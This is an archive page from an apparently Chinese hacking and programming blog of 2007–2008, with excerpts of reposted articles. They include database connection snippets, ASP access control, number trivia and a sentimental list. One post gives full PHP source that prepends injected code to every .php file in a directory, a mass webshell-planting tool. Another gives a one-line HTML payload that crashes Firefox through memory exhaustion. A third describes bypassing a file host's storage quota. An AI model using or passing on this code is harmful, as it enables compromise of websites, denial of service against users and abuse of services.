存档

文章标签 ‘转载’

数据恢复软件简测 | 烧锅ZT

2008年1月22日 没有评论

没有时间写下了,直接给出链接地址吧:
http://blog.donews.com/sogoo/archive/2006/08/21/1009404.aspx

Xall.php-批量查询插入一句话

2008年1月17日 没有评论

作者:xy7[B.C.T]

总是忘记一句话放到哪个文件里去了,直接全部干掉…

<br /><?//xy7<br />if (!isset($dir) or empty($dir)) {<br />$dir=str_replace(&#039;&#92;&#92;&#039;,&#039;/&#039;,dirname(__FILE__));<br />echo "<font color=&#92;"#00688B&#92;">".$dir."</font>";<br />} else {<br />$dir=$_GET&#91;&#039;dir&#039;&#93;;<br />echo "<font color=&#92;"#00688B&#92;">".$dir."</font>";<br />}<br />$evilcode="<?phpinfo();//xy7?>";<br />$testdir = opendir($dir);<br />while($filea = @readdir($testdir)){<br />if(strstr($filea, &#039;.php&#039;)){<br />$fp = @fopen($filea, &#039;r+&#039;);<br />if (!strstr(@fread($fp, 20), &#039;xy7&#039;)){<br />rewind($fp);<br />$old = @fread($fp, filesize($filea));<br />rewind($fp);<br />fwrite($fp, $evilcode . $old);<br />}<br />fclose($fp);<br />}<br />}<br />closedir($testdir);<br />?><br /><hr><br /><table width="100%" border="0" cellpadding="3" cellspacing="1"><br /><tr><br /><td><b>被X的文件</b></td><br /><td><b>时间</b></td><br /><td><b>大小</b></td><br /></tr><br /><?php<br />$dirs=@opendir($dir);<br />while ($file=@readdir($dirs)) {<br />if ((is_file($file)) and (ereg("&#92;.php{0,1}$",$file)))<br />{$b="$dir/$file";<br />$a=@is_dir($b);<br />if($a=="0"){<br />$size=@filesize("$dir/$file");<br />$lastsave=@date("Y-n-d H:i:s",filectime("$dir/$file"));<br />echo "<tr>&#92;n";<br />echo "<td>$file</td>&#92;n";<br />echo " <td>$lastsave</td>&#92;n";<br />echo " <td>$size Bytes</td>&#92;n";<br />}<br />}<br />}<br />@closedir($dirs);<br />?><br /></table><br />codz by xuanmumu

分类: 编程地带 标签: ,

DDOS Firefox代码

2008年1月11日 没有评论

来源:Neeao's Security Blog

另存为htm,用firefox打开看看!最好打开任务管理器,盯着firefox内存占用看。爽吧!

<img src="" onerror="appendChild(cloneNode(appendChild(cloneNode(1))))">

分类: 网络安全 标签:

突破永硕E盘ys168.com免费用户30M容量上限继续上传文件

2008年1月8日 没有评论

来源:野球小子

永硕E盘ys168.com免费用户30M容量上限破解方法如下:
1、确认你的空间已经满了不能再上传东西了,比如只剩0.1M了;
2、下载并安装GreenBrowser这一款绿色浏览器并把它设为默认游览器;
3、设置GreenBrowser的“弹出过滤”如下图: 阅读全文…

分类: 娱乐休闲 标签:

腾讯永远不敢放出的QQ——60481729

2008年1月8日 1 条评论

来源:netXeyes 论坛
注:还是第一次听说有这样的事。。
原帖:
大家先去查找60481729这个QQ。。。。。。怎么样?什么也查不到吧!
为什么极其普通的一个号TX一直不敢放出来呢?
首先得从这个号码的数字上分析原因。大家注意没?我把60481729这个QQ从中间分开,分成6048和1729两个数字。然后再相加。即6048+1729=7777,很不错的数字。还没完呢。继续。而7777×7777=60481729,晕!怎么又回来了?? 
    这个数字正是传说中的雷劈数!(印度某个数学家发现的,之所以叫雷劈数是因为 阅读全文…

分类: 娱乐休闲 标签: , , ,

两种javascript的跨域信息提交方式(POST)

2007年12月31日 1 条评论

来源:恶魔傻蛋
1.剪切板+iframe方式.
域:aaa.com,bbb.com
aaa.com中的一个文件,1.html内容

<br /><html><br /><head><br /><title>js跨域</title><br /></head><br /><body><br /><script language="javascript"><br />var info="测试";<br />window.clipboardData.setData("text",info);<br /></script><br /><iframe id="aaa" src="http://b.com/2.html"><br /></iframe><br /></body><br /></html>

bbb.com中一个文件,2.html内容               阅读全文…

分类: 网络安全 标签: ,

各种数据库连接代码

2007年12月31日 没有评论

MS Access数据库连接

用DSN连接并且没有用户名和密码:

<br />< %<br />set conn = Server.CreateObject("ADODB.Connection")<br />conn.open "YourDSNName"<br />%>

用DSN连接并且有用户名和密码:

<br />< %<br />set conn = Server.CreateObject("ADODB.Connection")<br />conn.open "YourDSNName","username","password"<br />%><br />

用实际的数据库绝对路径连接: 阅读全文…

ASP网页访问权的控制

2007年12月31日 没有评论

     在浏览器/服务器应用中,如果允许客户使用浏览器通过匿名身份访问网页,那么进一步限制客户访问具体的网页通常要客户表明身份(例如提示登陆),在网页初始部分验证客户的身份,如果通过身份验证,则可浏览到网页的具体内容,否则提示访问受到限制。
  一般的浏览器/服务器应用应有一个主页,其上有进入不同网页的超链接。在Active Server Page应用中,我们知道,可以在进入主页时进行一次登录,把登录成功信息保存会话变量中,然后在进入该应用的其它网页时,只需检验这个会话变量,无需再做登陆验证。通常的做法是在每个网页的开始部分检验客户是否登录过,如果没有登录,转入登陆页完成登陆;如果登陆过,则显示网页内容。扩展这种检查,可以进一步检查不同的客户能否访问网页内容,如果无权访问,给出提示。不过这种在进入到具体的网页后才验证身份,对于无权访问该网页的客户来说就有一种进入死胡同的感觉。如果能够在超链接点击时即给予无权访问的提示,并且保持超链接不向下进入,可以给客户一个更好的印象。 阅读全文…

分类: 编程地带 标签: ,

真正爱你的男孩

2007年12月30日 没有评论

正爱你的男孩,总是喜欢叫你小妹妹,可每次心里感到脆弱的时候,还是会用姐姐来称呼你  

真正爱你的男孩,虽然想听你对他说“亲爱的”,其实心里更愿意听的是“你个死人,你跑到了哪里?“  

真正爱你的男孩,虽然有很长一段时间他看不到你,但你会发现他的手机里保存的全是你发给他的暧昧的信息  

真正爱你的男孩,他会故意说要你给他唱歌听,其实他更喜欢的是你和他在温柔的争执的可爱的脾气   阅读全文…

分类: 娱乐休闲 标签: ,